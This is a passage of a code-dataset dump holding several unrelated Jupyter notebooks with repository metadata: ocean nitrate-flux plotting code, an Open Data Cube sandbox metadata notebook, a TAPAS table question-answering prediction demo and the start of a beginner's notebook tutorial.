cbax.append(ax3,)\n\nax7=fig.add_subplot(gsl[0])\nviz_tools.set_aspect(ax7)\nax9=fig.add_subplot(gsl[2])\nax.append(ax3,)\nax.append(ax3,)\nax.append(ax7,)\ncbax.append(ax9,)\ncbax.append(ax9,)\n\nv1=3000\nm=ax[0].pcolormesh(np.ma.masked_where(mask['V']==0,1000*(meanT['V']+meanM['V'])),cmap=cmb,vmin=-1*v1,vmax=v1)\nax[0].set_title('Northward NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection + Mixing')\nm=ax[1].pcolormesh(np.ma.masked_where(mask['U']==0,1000*(meanT['U']+meanM['U'])),cmap=cmb,vmin=-1*v1,vmax=v1)\ncb0=fig.colorbar(m,cax=cbax[0])\nax[1].set_title('Eastward NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection + Mixing')\nv2=15\nm=ax[2].pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanT['W'])),cmap=cmc,vmin=-1*v2,vmax=v2)\nax[2].set_title('Vertical NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection')\nm=ax[3].pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanM['W'])),cmap=cmc,vmin=-1*v2,vmax=v2)\ncb1=fig.colorbar(m,cax=cbax[1])\nax[3].set_title('Vertical NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nMixing')\n\nnn.drawboxesV(ax[0],boxes,boxCol)\nnn.drawboxesU(ax[1],boxes,boxCol)\nnn.drawboxesT(ax[2],boxes,boxCol)\nnn.drawboxesT(ax[3],boxes,boxCol)\nfor iax in ax:\n iax.set_facecolor(mapCol)\nax[0].set_xlim(-13,ig1-ig0)\nax[1].set_xlim(0,ig1-ig0-.5)\nax[2].set_xlim(-13,ig1-ig0)\nax[3].set_xlim(-13,ig1-ig0)\n\nax[0].set_ylim(.5,jg1-jg0-.5)\nax[1].set_ylim(1,jg1-jg0)\nax[2].set_ylim(1,jg1-jg0)\nax[3].set_ylim(1,jg1-jg0)\n\nnn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC)\nnn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC)\nnn.annotWTTranspUpper(ax[2],boxes,BBoundC)\nnn.annotWMTranspUpper(ax[3],boxes,BBoundMixC)\n\nx1=ax[1].get_position()\nxc1=cbax[0].get_position()\ncbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3]))\nx2=ax[3].get_position()\nxc2=cbax[1].get_position()\ncbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3]))\n\nfig.canvas.draw()\nfor icb in (cb0,cb1):\n test=icb.ax.yaxis.get_ticklabels()\n test[0].set_text('$\\leq$'+(test[0].get_text()))\n test[-1].set_text('$\\geq$'+(test[-1].get_text()))\n icb.ax.yaxis.set_ticklabels(test)\n\ncm0=cmocean.cm.thermal\ncm0.set_bad(mapCol)\ncm1=cmocean.cm.dense_r\ncm1.set_bad(mapCol)\n\n\n\niax=ax[6]\nii0=6\n#log scale arrow magnitude without ruining vector directions:\nclim=(0,3.5)\nsubN=9\nsh=np.shape(mUT)#mUT\nshx,shy=np.meshgrid(np.arange(ii0,sh[1],subN),np.arange(ii0,sh[0],subN))\n#log scale arrow magnitude without ruining vector directions:\nugrd=mUT\nvgrd=mVT\nmesh=iax.contourf(np.ma.masked_where(tmask[0,:,:]==0,\n np.sqrt(ugrd[:,:]**2+vgrd[:,:]**2)),\n np.linspace(clim[0],clim[1],200),vmin=clim[0],vmax=clim[1],cmap=cm1,extend='max')\nmag0=np.sqrt(ugrd**2+vgrd**2)\nugrd2=np.ma.masked_where(tmask[0,:,:]==0,ugrd)#np.where(mag0==0,0,ugrd*mag2/mag0))\nvgrd2=np.ma.masked_where(tmask[0,:,:]==0,vgrd)#np.where(mag0==0,0,vgrd*mag2/mag0))\nQ = iax.quiver(shx,shy,ugrd2[ii0::subN, ii0::subN], vgrd2[ii0::subN, ii0::subN],\n pivot='mid', units='inches',width=.03,color='w',scale=7,alpha=.7)#scale=4000\niax.set_title('Vertically Integrated\\nVelocity (m$^2$ s$^{-1}$)')\niax.set_xticks([],[]);\niax.set_yticks([],[]);\ncb=fig.colorbar(mesh,cax=cbax[3],ticks=np.linspace(clim[0],clim[1],6))\nbb=cbax[3].get_position()\ncbax[3].set_position([bb.x0-.205,bb.y0,bb.width,bb.height])\n#p0=ax1.get_position()\n\n\nfig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.png',dpi=300)\nfig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.pdf',dpi=300)\nprint('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.pdf')",
"/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k6_2016.pdf\n"
]
],
[
[
"### look at total upward N transports",
"_____no_output_____"
]
],
[
[
"fig,ax=plt.subplots(1,1)\nax.pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])),\n cmap=cmc,vmin=-1,vmax=1)\nnn.drawboxesV(ax,boxes,boxCol)",
"_____no_output_____"
],
[
"## total net N transport in moles N / s\nnp.sum(np.sum(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])*e12t),1),0)*1e-6\n",
"_____no_output_____"
],
[
"## total net N transport in moles N / s\nnp.sum(np.sum(np.ma.masked_where(mask['W'][:-3,:]==0,1000*(meanT['W'][:-3,:]+meanM['W'][:-3,:])*e12t[:-3,:]),1),0)*1e-6\n",
"_____no_output_____"
]
],
[
[
"##### divide both by area:",
"_____no_output_____"
]
],
[
[
"# whole range, umol/m2/s\nnp.sum(np.sum(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])*e12t),1),0)/np.sum(np.sum(e12t*mask['W']))",
"_____no_output_____"
],
[
"# cut off 3, umol/m2/s\nnp.sum(np.sum(np.ma.masked_where(mask['W'][:-3,:]==0,1000*(meanT['W'][:-3,:]+meanM['W'][:-3,:])*e12t[:-3,:]),1),0)/np.sum(np.sum(e12t[:-3,:]*mask['W'][:-3,:]))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e7093c1f55a35a0904e257bd0e60e8c9cd74345e | 285,912 | ipynb | Jupyter Notebook | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | 132.121996 | 188,176 | 0.735954 | [
[
[
"# Sandbox Metadata Document\n\nThis document aims to provide an overview of the different data sets available in the Open Data Cube Sandbox. It will provide details on which products are available, what regions are indexed for each product, and the time series available within that extent.\n\nFor information on how to get started with the Datacube, please see the read_me_first.ipynb available [here](https://sandbox.test.frontiersi.io/user/sandbox/notebooks/Read_me_first.ipynb).\n\n* [Datacube Information](#datacube) \n * [ALOS 2](#alos2) \n * [Landsat 5](#ls5) \n * [Landsat 7](#ls7) \n * [Landsat 8](#ls8) \n * [Sentinel 1](#s1)\n* [Product coverage illustration](#map)\n \n* [System Information](#system)",
"_____no_output_____"
],
[
"<a class=\"anchor\" id=\"datacube\"></a>\n## Datacube Information",
"_____no_output_____"
]
],
[
[
"from IPython.core.display import display, HTML\nimport pandas as pd\n\nimport datacube\ndc = datacube.Datacube()\ndc.list_products()",
"_____no_output_____"
]
],
[
[
"<a class=\"anchor\" id=\"alos2\"></a>\n### alos2_palsar_AMA_ingest\n\n**Caqueta** \n``Time: 2015-01-01 and 2016-01-01 `` \n``latitude: ( 0, 3.2)`` \n``longitude: (-76.26666668, -73.6)`` \n\n**Vietnam** \n``Time: 2015-01-01 and 2016-01-01 `` \n``latitude: ( 7.46666667, 12.8)`` \n``longitude: (103.46666668, 110.4)`` \n\n*****\n<a class=\"anchor\" id=\"ls5\"></a>\n### ls5_level1_usgs\n*No Data Indexed*\n*****\n### ls5_usgs_sr_scene\n\n``Time: 1984-05-26 to 2011-11-13`` \n``y: (-587700.0, 2187300.0)`` \n``x: ( 68100.0, 932400.0)`` \n\n*****\n<a class=\"anchor\" id=\"ls7\"></a>\n### ls7_collection1_AMA_ingest\n\n**Caqueta** \n``Time: 1999-08-21 to 2018-03-25`` \n``latitude: ( 0.000134747292617865, 1.077843593651382)`` \n``longitude: (-74.91935994831539, -73.30266193148462)`` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n**Lake Baringo, Kenya** \n``Time: 2005-01-08 to 2016-12-24`` \n``latitude: ( 0.4997747685, 0.7495947795)`` \n``longitude: (35.9742163305, 36.473586859499996)`` \n``resolution: (-0.000269493, 0.000269493)`` \n\n*****\n### ls7_level1_usgs\n*No Data Indexed*\n\n*****\n### ls7_usgs_sr_scene\n\n``Time: 1999-07-08 to 2018-11-02`` \n``y: (-586200.0, 2185200.0)`` \n``x: ( 70800.0, 935100.0)`` \n\n*****\n<a class=\"anchor\" id=\"ls8\"></a>\n### ls8_collection1_AMA_ingest\n\n**Caqueta** \n``Time: 2013-04-13 to 2018-03-26`` \n``latitude: ( 0.000134747292617865, 1.077843593651382)`` \n``longitude: (-74.91935994831539, -73.30266193148462) `` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n**Vietnam** \n``Time: 2014-01-14 to 2016-12-21`` \n``latitude: ( 10.513927001104687, 12.611133863411238)`` \n``longitude: (106.79005909290998, 108.91906631627438) `` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n*****\n### ls8_l1_pc_usgs\n*No Data Indexed*\n\n*****\n### ls8_level1_usgs \n[Global](https://sandbox.test.frontiersi.io/user/lsgeo/view/examples/images/indexed_areas.png)\n\n\n*****\n### ls8_usgs_sr_scene\n``Time: 2013-03-21 to 2018-11-16`` \n``y: (-596700.0, 2193300.0)`` \n``x: ( 82500.0, 930300.0)`` \n\n*****\n<a class=\"anchor\" id=\"s1\"></a>\n### s1_gamma0_scene\n\n``Time: 2015-05-12 to 2018-07-20``\n\n**Caqueta** \n``latitude: ( 1.00018083, 2.)`` \n``longitude: (-75., -74.)`` \n\n**Samoa** \n``latitude: ( -13.99981917, -13.)`` \n``longitude: (-171., -173.)`` \n\n",
"_____no_output_____"
],
[
"<a class=\"anchor\" id=\"map\"></a>\n### Plotting Indicative Data Extents\n\nThe following code generates an overview of the approximte extents of the product selected on line 1, shown in red. The yellow base image shows the extents of the global ls8_level1_usgs product.",
"_____no_output_____"
]
],
[
[
"product = 'ls8_collection1_AMA_ingest'\n\nimport matplotlib.pyplot as plt\nfrom pyproj import Proj, transform\n\nimport datacube\ndc = datacube.Datacube()\n\noutProj = Proj(init='epsg:4326')\n\nx_bounds = []\ny_bounds = []\nunique_bounds=set()\nbounds=[]\ntimes=[]\ntiles = dc.find_datasets(product=product)\nif max(tiles[0].bounds) > 180: XY = True\nelse: XY = False\n\nfor tile in tiles:\n if XY:\n inProj = Proj(init=tile.crs)\n l_lon,t_lat = transform(inProj,outProj,tile.bounds.left,tile.bounds.top)\n r_lon,b_lat = transform(inProj,outProj,tile.bounds.right,tile.bounds.bottom)\n x_bounds = [l_lon, r_lon, r_lon, l_lon]\n y_bounds = [t_lat, t_lat, b_lat, b_lat]\n \n else:\n x_bounds = [tile.bounds.left, tile.bounds.right, tile.bounds.right, tile.bounds.left]\n y_bounds = [tile.bounds.top, tile.bounds.top, tile.bounds.bottom, tile.bounds.bottom]\n \n times.append(tile.time)\n bounds_key = \"\".join(str(x) for x in x_bounds) + \"\".join(str(y) for y in y_bounds)\n if bounds_key not in unique_bounds:\n bounds.append([x_bounds, y_bounds, tile.time])\n\n%matplotlib inline\nfig, ax = plt.subplots(1, figsize = (18,9))\nfor i in bounds:\n ax.fill(i[0], i[1], c='red')\nax.axis('equal')\n\nplt.title(product)\nax.set_xlabel('Longitude')\nax.set_ylabel('Latitude')\nbasemap = plt.imread('./examples/images/indexed_areas.png')\nax.imshow(basemap, extent=[-180,180,-90,90])\nax.set_xlim(-180,180)\nax.set_ylim(-90, 90)\nplt.show()\nprint('Time:', min(times[-1]).strftime('%Y-%m-%d'), 'to', max(times[0]).strftime('%Y-%m-%d'))",
"_____no_output_____"
]
],
[
[
"<a class=\"anchor\" id=\"system\"></a>\n# System Information",
"_____no_output_____"
]
],
[
[
"import sys\nprint('Python Version', sys.version)",
"Python Version 3.6.7 (default, Oct 22 2018, 11:32:17) \n[GCC 8.2.0]\n"
],
[
"!pip3 show datacube xarray numpy pandas gdal matplotlib ",
"Name: datacube\nVersion: 1.6.1+179.gc4ed2929.dirty\nSummary: An analysis environment for satellite and other earth observation data\nHome-page: https://github.com/opendatacube/datacube-core\nAuthor: Open Data Cube\nAuthor-email: None\nLicense: Apache License 2.0\nLocation: /usr/local/lib/python3.6/dist-packages\nRequires: affine, cachetools, click, cloudpickle, dask, gdal, jsonschema, netcdf4, numpy, psycopg2, pypeg2, python-dateutil, pyyaml, rasterio, singledispatch, sqlalchemy, toolz, xarray\n---\nName: xarray\nVersion: 0.10.7\nSummary: N-D labeled arrays and datasets in Python\nHome-page: https://github.com/pydata/xarray\nAuthor: xarray Developers\nAuthor-email: [email protected]\nLicense: Apache\nLocation: /usr/local/lib/python3.6/dist-packages\nRequires: pandas, numpy\n---\nName: numpy\nVersion: 1.15.4\nSummary: NumPy: array processing for numbers, strings, records, and objects.\nHome-page: http://www.numpy.org\nAuthor: Travis E. Oliphant et al.\nAuthor-email: None\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: \n---\nName: pandas\nVersion: 0.23.4\nSummary: Powerful data structures for data analysis, time series, and statistics\nHome-page: http://pandas.pydata.org\nAuthor: None\nAuthor-email: None\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: python-dateutil, pytz, numpy\n---\nName: GDAL\nVersion: 2.3.2\nSummary: GDAL: Geospatial Data Abstraction Library\nHome-page: http://www.gdal.org\nAuthor: Howard Butler\nAuthor-email: [email protected]\nLicense: MIT\nLocation: /usr/lib/python3/dist-packages\nRequires: \n---\nName: matplotlib\nVersion: 3.0.2\nSummary: Python plotting package\nHome-page: http://matplotlib.org\nAuthor: John D. Hunter, Michael Droettboom\nAuthor-email: [email protected]\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: pyparsing, cycler, python-dateutil, numpy, kiwisolver\n"
]
],
[
[
"## Extent Query Functions",
"_____no_output_____"
]
],
[
[
"#Generates text extents of data\nproduct = 's1_gamma0_scene'\n\nimport datacube\ndc = datacube.Datacube()\nimport numpy as np\n\nleft = np.array([])\nbottom = np.array([])\nright = np.array([])\ntop = np.array([])\ntimes = np.array([])\n\ntiles = dc.find_datasets(product=product)\nfor tile in tiles: #Each tile (unique time for each)\n left = np.append(left, tile.bounds[0])\n right = np.append(right, tile.bounds[2])\n top = np.append(top, tile.bounds[3])\n bottom = np.append(bottom, tile.bounds[1])\n times = np.append(times, tile.time)\n #corners = np.append(corners, [])\nprint('Max Extent')\nprint('``Time:', min(times).strftime('%Y-%m-%d'), 'to', max(times).strftime('%Y-%m-%d')+'`` ')\nprint('``latitude: ('+str(min(np.unique(bottom)))+', '+str(max(np.unique(top)))+')`` ')\nprint('``longitude: ('+str(min(np.unique(left)))+', '+str(max(np.unique(right)))+')`` ')\n\nprint('Discrete Extents')\nprint('``Time:', min(times).strftime('%Y-%m-%d'), 'to', max(times).strftime('%Y-%m-%d')+'`` ')\nprint('``latitude: ('+str(np.unique(bottom))+', '+str(np.unique(top))+')`` ')\nprint('``longitude: ('+str(np.unique(left))+', '+str(np.unique(right))+')`` ')",
"Max Extent\n``Time: 2015-05-12 to 2018-07-20`` \n``latitude: (-13.9998191681736, 2.0)`` \n``longitude: (-173.0, -74.0)`` \nDiscrete Extents\n``Time: 2015-05-12 to 2018-07-20`` \n``latitude: ([-13.99981917 1.00018083], [-13. 2.])`` \n``longitude: ([-173. -172. -75.], [-172. -171. -74.])`` \n"
],
[
"pd.options.display.max_rows = 200\ndc.list_measurements()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e7093db6be194ab0f2ec28580b7550c2fc3e0f17 | 14,239 | ipynb | Jupyter Notebook | notebooks/wtq_predictions.ipynb | renuka1983/Tapas | 9f30d32ffccf25d5650847000099c11e10820ff7 | [
"Apache-2.0"
] | 816 | 2020-03-31T15:15:56.000Z | 2022-03-31T19:28:02.000Z | notebooks/wtq_predictions.ipynb | JingfengYang/tapas | 733aca5273e560ad8c6380b7be984a3a680e97f6 | [
"Apache-2.0"
] | 155 | 2020-05-02T15:45:42.000Z | 2022-03-31T08:35:23.000Z | notebooks/wtq_predictions.ipynb | JingfengYang/tapas | 733aca5273e560ad8c6380b7be984a3a680e97f6 | [
"Apache-2.0"
] | 173 | 2020-05-01T02:39:38.000Z | 2022-03-30T06:43:29.000Z | 37.569921 | 311 | 0.496032 | [
[
[
"<a href=\"https://colab.research.google.com/github/google-research/tapas/blob/master/notebooks/wtq_predictions.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"##### Copyright 2020 The Google AI Language Team Authors\n\nLicensed under the Apache License, Version 2.0 (the \"License\");",
"_____no_output_____"
]
],
[
[
"# Copyright 2019 The Google AI Language Team Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"Running a Tapas fine-tuned checkpoint\n---\nThis notebook shows how to load and make predictions with TAPAS model, which was introduced in the paper: [TAPAS: Weakly Supervised Table Parsing via Pre-training](https://arxiv.org/abs/2004.02349)",
"_____no_output_____"
],
[
"# Clone and install the repository\n",
"_____no_output_____"
],
[
"First, let's install the code.",
"_____no_output_____"
]
],
[
[
"! pip install tapas-table-parsing",
"_____no_output_____"
]
],
[
[
"# Fetch models fom Google Storage",
"_____no_output_____"
],
[
"Next we can get pretrained checkpoint from Google Storage. For the sake of speed, this is a medium sized model trained on [WTQ](https://nlp.stanford.edu/blog/wikitablequestions-a-complex-real-world-question-understanding-dataset/). Note that best results in the paper were obtained with a large model.",
"_____no_output_____"
]
],
[
[
"! gsutil cp \"gs://tapas_models/2020_08_05/tapas_wtq_wikisql_sqa_masklm_medium_reset.zip\" \"tapas_model.zip\" && unzip tapas_model.zip\n! mv tapas_wtq_wikisql_sqa_masklm_medium_reset tapas_model",
"_____no_output_____"
]
],
[
[
"# Imports",
"_____no_output_____"
]
],
[
[
"import tensorflow.compat.v1 as tf\nimport os \nimport shutil\nimport csv\nimport pandas as pd\nimport IPython\n\ntf.get_logger().setLevel('ERROR')",
"_____no_output_____"
],
[
"from tapas.utils import tf_example_utils\nfrom tapas.protos import interaction_pb2\nfrom tapas.utils import number_annotation_utils\nfrom tapas.scripts import prediction_utils",
"_____no_output_____"
]
],
[
[
"# Load checkpoint for prediction",
"_____no_output_____"
],
[
"Here's the prediction code, which will create and `interaction_pb2.Interaction` protobuf object, which is the datastructure we use to store examples, and then call the prediction script.",
"_____no_output_____"
]
],
[
[
"os.makedirs('results/wtq/tf_examples', exist_ok=True)\nos.makedirs('results/wtq/model', exist_ok=True)\nwith open('results/wtq/model/checkpoint', 'w') as f:\n f.write('model_checkpoint_path: \"model.ckpt-0\"')\nfor suffix in ['.data-00000-of-00001', '.index', '.meta']:\n shutil.copyfile(f'tapas_model/model.ckpt{suffix}', f'results/wtq/model/model.ckpt-0{suffix}')",
"_____no_output_____"
],
[
"max_seq_length = 512\nvocab_file = \"tapas_model/vocab.txt\"\nconfig = tf_example_utils.ClassifierConversionConfig(\n vocab_file=vocab_file,\n max_seq_length=max_seq_length,\n max_column_id=max_seq_length,\n max_row_id=max_seq_length,\n strip_column_names=False,\n add_aggregation_candidates=False,\n)\nconverter = tf_example_utils.ToClassifierTensorflowExample(config)\n\ndef convert_interactions_to_examples(tables_and_queries):\n \"\"\"Calls Tapas converter to convert interaction to example.\"\"\"\n for idx, (table, queries) in enumerate(tables_and_queries):\n interaction = interaction_pb2.Interaction()\n for position, query in enumerate(queries):\n question = interaction.questions.add()\n question.original_text = query\n question.id = f\"{idx}-0_{position}\"\n for header in table[0]:\n interaction.table.columns.add().text = header\n for line in table[1:]:\n row = interaction.table.rows.add()\n for cell in line:\n row.cells.add().text = cell\n number_annotation_utils.add_numeric_values(interaction)\n for i in range(len(interaction.questions)):\n try:\n yield converter.convert(interaction, i)\n except ValueError as e:\n print(f\"Can't convert interaction: {interaction.id} error: {e}\")\n \ndef write_tf_example(filename, examples):\n with tf.io.TFRecordWriter(filename) as writer:\n for example in examples:\n writer.write(example.SerializeToString())\n\ndef aggregation_to_string(index):\n if index == 0:\n return \"NONE\"\n if index == 1:\n return \"SUM\"\n if index == 2:\n return \"AVERAGE\"\n if index == 3:\n return \"COUNT\"\n raise ValueError(f\"Unknown index: {index}\")\n\ndef predict(table_data, queries):\n table = [list(map(lambda s: s.strip(), row.split(\"|\"))) \n for row in table_data.split(\"\\n\") if row.strip()]\n examples = convert_interactions_to_examples([(table, queries)])\n write_tf_example(\"results/wtq/tf_examples/test.tfrecord\", examples)\n write_tf_example(\"results/wtq/tf_examples/random-split-1-dev.tfrecord\", [])\n \n ! python -m tapas.run_task_main \\\n --task=\"WTQ\" \\\n --output_dir=\"results\" \\\n --noloop_predict \\\n --test_batch_size={len(queries)} \\\n --tapas_verbosity=\"ERROR\" \\\n --compression_type= \\\n --reset_position_index_per_cell \\\n --init_checkpoint=\"tapas_model/model.ckpt\" \\\n --bert_config_file=\"tapas_model/bert_config.json\" \\\n --mode=\"predict\" 2> error\n\n\n results_path = \"results/wtq/model/test.tsv\"\n all_coordinates = []\n df = pd.DataFrame(table[1:], columns=table[0])\n display(IPython.display.HTML(df.to_html(index=False)))\n print()\n with open(results_path) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n for row in reader:\n coordinates = sorted(prediction_utils.parse_coordinates(row[\"answer_coordinates\"]))\n all_coordinates.append(coordinates)\n answers = ', '.join([table[row + 1][col] for row, col in coordinates])\n position = int(row['position'])\n aggregation = aggregation_to_string(int(row[\"pred_aggr\"]))\n print(\">\", queries[position])\n answer_text = str(answers)\n if aggregation != \"NONE\":\n answer_text = f\"{aggregation} of {answer_text}\"\n print(answer_text)\n return all_coordinates",
"_____no_output_____"
]
],
[
[
"# Predict",
"_____no_output_____"
]
],
[
[
"# Based on SQA example nu-1000-0\nresult = predict(\"\"\"\nPos | No | Driver | Team | Laps | Time/Retired | Grid | Points\n1 | 32 | Patrick Carpentier | Team Player's | 87 | 1:48:11.023 | 1 | 22 \n2 | 1 | Bruno Junqueira | Newman/Haas Racing | 87 | +0.8 secs | 2 | 17 \n3 | 3 | Paul Tracy | Team Player's | 87 | +28.6 secs | 3 | 14\n4 | 9 | Michel Jourdain, Jr. | Team Rahal | 87 | +40.8 secs | 13 | 12\n5 | 34 | Mario Haberfeld | Mi-Jack Conquest Racing | 87 | +42.1 secs | 6 | 10\n6 | 20 | Oriol Servia | Patrick Racing | 87 | +1:00.2 | 10 | 8 \n7 | 51 | Adrian Fernandez | Fernandez Racing | 87 | +1:01.4 | 5 | 6\n8 | 12 | Jimmy Vasser | American Spirit Team Johansson | 87 | +1:01.8 | 8 | 5\n9 | 7 | Tiago Monteiro | Fittipaldi-Dingman Racing | 86 | + 1 Lap | 15 | 4\n10 | 55 | Mario Dominguez | Herdez Competition | 86 | + 1 Lap | 11 | 3\n11 | 27 | Bryan Herta | PK Racing | 86 | + 1 Lap | 12 | 2\n12 | 31 | Ryan Hunter-Reay | American Spirit Team Johansson | 86 | + 1 Lap | 17 | 1\n13 | 19 | Joel Camathias | Dale Coyne Racing | 85 | + 2 Laps | 18 | 0\n14 | 33 | Alex Tagliani | Rocketsports Racing | 85 | + 2 Laps | 14 | 0\n15 | 4 | Roberto Moreno | Herdez Competition | 85 | + 2 Laps | 9 | 0\n16 | 11 | Geoff Boss | Dale Coyne Racing | 83 | Mechanical | 19 | 0\n17 | 2 | Sebastien Bourdais | Newman/Haas Racing | 77 | Mechanical | 4 | 0\n18 | 15 | Darren Manning | Walker Racing | 12 | Mechanical | 7 | 0\n19 | 5 | Rodolfo Lavin | Walker Racing | 10 | Mechanical | 16 | 0\n\"\"\", [\"Who are the drivers with 87 laps?\", \"Sum of laps for team Walker Racing?\", \"Average grid for the drivers with less than 80 laps?\",])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7093f59aa577ea888f95f58d2bcde6550007f52 | 6,459 | ipynb | Jupyter Notebook | notebooks/00_Notebooks.ipynb | yutiansut/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 51 | 2019-02-01T19:43:37.000Z | 2022-03-16T09:07:03.000Z | notebooks/00_Notebooks.ipynb | Approximetal/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 13 | 2020-01-28T22:32:51.000Z | 2022-03-11T23:39:06.000Z | notebooks/00_Notebooks.ipynb | Approximetal/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 35 | 2019-02-08T02:00:31.000Z | 2022-03-01T23:17:00.000Z | 30.323944 | 271 | 0.514476 | [
[
[
"# Notebook Basics",
"_____no_output_____"
],
[
"<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/logo.png\" width=150>\n\nWelcome to the very first lesson of practicalAI. In this lesson we will learn how to work with the notebook and saving it. If you already know how to use notebooks, feel free to skip this lesson.\n\n<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/colab.png\" width=150>\n\n**Note**: To run the code in this notebook, follow these steps:\n1. Sign into your Google account.\n2. Click the **COPY TO DRIVE** button on the toolbar. This will open the notebook on a new tab.\n\n<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/copy_to_drive.png\">\n\n3. Rename this new notebook by removing the **Copy of** part in the title.\n4. Run the code, make changes, etc. and it's all automatically saved to you personal Google Drive.\n\n",
"_____no_output_____"
],
[
"# Types of cells",
"_____no_output_____"
],
[
"Notebooks are a great visual way of programming. We will use these notebooks to code in Python and learn the basics of machine learning. First, you need to know that notebooks are made up of cells. Each cell can either be a **code cell** or a **text cell**. \n\n* **text cells**: used for headers and paragraph text. \n* **code cells**: used for holding code.\n\n\n",
"_____no_output_____"
],
[
"# Creating cells\n\nFirst, let's create a text cell. To create a cell at a particular location, just click on the spot and create a text cell by clicking on the **➕TEXT** below the *View* button up top. Once you made the cell, click on it and type the following inside it:\n\n\n```\n### This is a header\nHello world!\n```",
"_____no_output_____"
],
[
"# Running cells\nOnce you type inside the cell, press the **SHIFT** and **ENTER** together to run the cell.",
"_____no_output_____"
],
[
"# Editing cells\nTo edit a cell, double click it and you should be able to replace what you've typed in there.",
"_____no_output_____"
],
[
"# Moving cells\nOnce you create the cell, you can move it with the ⬆️**CELL** and ⬇️**CELL** buttons above. ",
"_____no_output_____"
],
[
"# Deleting cells\nYou can delete the cell by clicking on the cell and pressing the button with three vertical dots on the top right corner of the cell. Click **Delete cell**.",
"_____no_output_____"
],
[
"# Creating a code cell\nNow let's take the same steps as above to create, edit and delete a code cell. You can create a code cell by clicking on the ➕CODE below the *File* menu at the top. Once you have created the cell, click on it and type the following inside it:\n\n```\nprint (\"hello world!\")\n```\n\n⏰ - It may take a few seconds when you run your first code cell.",
"_____no_output_____"
]
],
[
[
"print (\"hello world!\")",
"hello world!\n"
]
],
[
[
